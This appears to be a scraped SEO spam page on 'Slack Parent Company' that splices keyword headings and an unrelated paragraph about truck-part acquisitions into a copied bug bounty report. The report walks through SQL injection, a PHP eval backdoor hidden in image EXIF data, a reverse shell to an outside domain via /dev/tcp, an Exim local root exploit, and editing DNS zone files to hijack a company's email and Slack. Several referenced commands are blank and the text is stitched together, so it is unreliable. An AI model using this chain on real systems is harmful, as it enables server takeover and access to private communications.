Slack Parent Company

| Posted on by



  1. Slack Parent Company Inc
  2. Who Owns Slack Technologies
  3. Slack Parent Company Crossword Clue
  4. Slack Parent Company Inc
Disclaimer : Prior permissions were taken before performing heavy attacks on the targets below, you should not try this without taking prior permission.

The following was reported to a program on HackerOne, I have redacted the company name, lets call it ParentCompany. So, ParentCompany has a program on HackerOne which has a child company lets say it childcompany.com , The childcompany was not in scope of the program nor mentioned anywhere on the policy page, but hacking inside it led to something which could have a critical security impact to the company. Here is the exact report i submitted on HackerOne with some redaction :

Hendrickson has acquired the Motor Wheel Brake Drum & Crewson slack adjuster business segments, based in Chattanooga, Tennessee and Berea, Kentucky, from Stemco and parent company EnPro Industries. The business segments will operate as a division of Hendrickson Truck Commercial Vehicle Systems. Slack is the collaboration hub that brings the right people, information, and tools together to get work done. From Fortune 100 companies to corner markets, millions of people around the world use Slack to connect their teams, unify their systems, and drive their business forward. Now that the firm is better capitalized it can compete better with deep-pocketed tech giants like Microsoft, Alphabet (Google’s parent company), and Facebook. Slack can also use the capital to attract and retain paying customers in a scenario where the big players have the added advantage of being able to bundle their versions of workplace.

Hello ParentCompany,

Going to the Slack url of ParentCompany : https://parentcompany.slack.com/ shows that If you have an @parentcompany.com or @childcompany.com email address, you can create an account.

The thing which interests me is the website childcompany.com, So If i am able to read emails of anything@childcompany.com i can get inside ParentCompany's Slack Team

Performing a whois search shows the organization to be ChildCompany with the nameservers ns1.childcompany.com and ns2.childcompany.com

XX.XX.XX.XX is the server ip of childcompany.com

Visiting http://XX.XX.XX.XX/ redirects to http://XX.XX.XX.XX/cgi-sys/defaultwebpage.cgi which displays :

So we have cPanel running on the server ( http://XX.XX.XX.XX:2082/ ) which means that somehow if we can get access to the server we can edit the zone file and add our MX records and receive mails with the address anything@childcompany.com

Who is slack owned by

So just to assume somehow we got access to the server, we still need to be root to edit the zone file of childcompany.com to add our MX Records.

Doing a nmap scan against childcompany.com shows that its running Exim smtpd 4.80 on port 26

Exim <= 4.84-3 has a very simple local root exploit (#REF: https://www.exploit-db.com/exploits/39535/ )

Ok so we know that cPanel is running on the server and we have a local root exploit by which we can possibly modify the zone file of childcompany.com to add our MX Records Now the most important step, We need a RCE on the server

SQLi :

Visiting the website i found mostly all of the files are vulnerable to SQLi

A warning can be seen on the page :

We also have admin panel at http://www.childcompany.com/admin/

The Following Query will fetch the credentials of admin panel :

which gives us :

We can login inside the Admin panel using the credentials admin:redactedpass. Inside the admin panel we can upload images by going to

So the uploader checks whether the uploaded file is a valid image or not but doesn't checks for the file extension, so we can upload a image with PHP backdoor in exif data, So I uploaded a image with <?php echo eval(base64_decode($_GET['cmd'])); ?><!-- in the comments of the image using the tool Exif Pilot.

Here is The Link to file executing the command id :

Slack Parent Company Inc

So now lets gain a backconnect shell, after trying many methods the following seems to work. We need to use a domain name instead of IP to gain the backconnect shell and firewall rules only allowed outbound connections to ports 80 and 443, Now to get the backconnect shell we need to save our backconnect payload into a file inside /tmp/ as somehow the server is blocking direct back connect through executing the command by the shell, but saving it in a file and executing the file seems to work, we can save the payload by the following command :

Where YmFzaCAtaSA+JiAvZGV2L3RjcC9teWRvbWFpbi5jb20vODAgMD4m is the backconnect payload bash -i >& /dev/tcp/mydomain.com/80 0>&1 and then run it by running the command bash /tmp/1
This Saves our payload inside /tmp/1 :

And then run it by visiting :

So we will get a backconnect and can easily gain root just by 2-3 commands :
Here is the zone file where all the DNS records are stored for the domain :

Impact

Who Owns Slack Technologies

Now as we are root we can simply add our MX records of any free business email provider such as ZohoMail by editing the zone file /var/named/childcompany.com.db and then run the command rndc reload childcompany.com to update the dns records. So now we can receive mails on behalf of childcompany.com and simply request a signup link to get inside ParentCompany's Slack Team and from there view internal communications between employees and attacker can pivot further to get access to https://parentcompany.com

Slack Parent Company Crossword Clue

Regards,
Parth :)

Takeaway

Slack

You should always check if you can somehow read emails of anything@domain.com, of the domain(s) mentioned in https://companyname.slack.com/ if it allows signup through email, may it be Ticket Trick, credientials found on GitHub or hacking inside an out of scope asset (with prior permissions ofcourse), as access to a company's slack can result in gaining full access to the company's servers, sensative information etc. Roma 2021 kitsempty spaces the blog.

Slack Parent Company Inc

Thanks Sandeep for proofreading.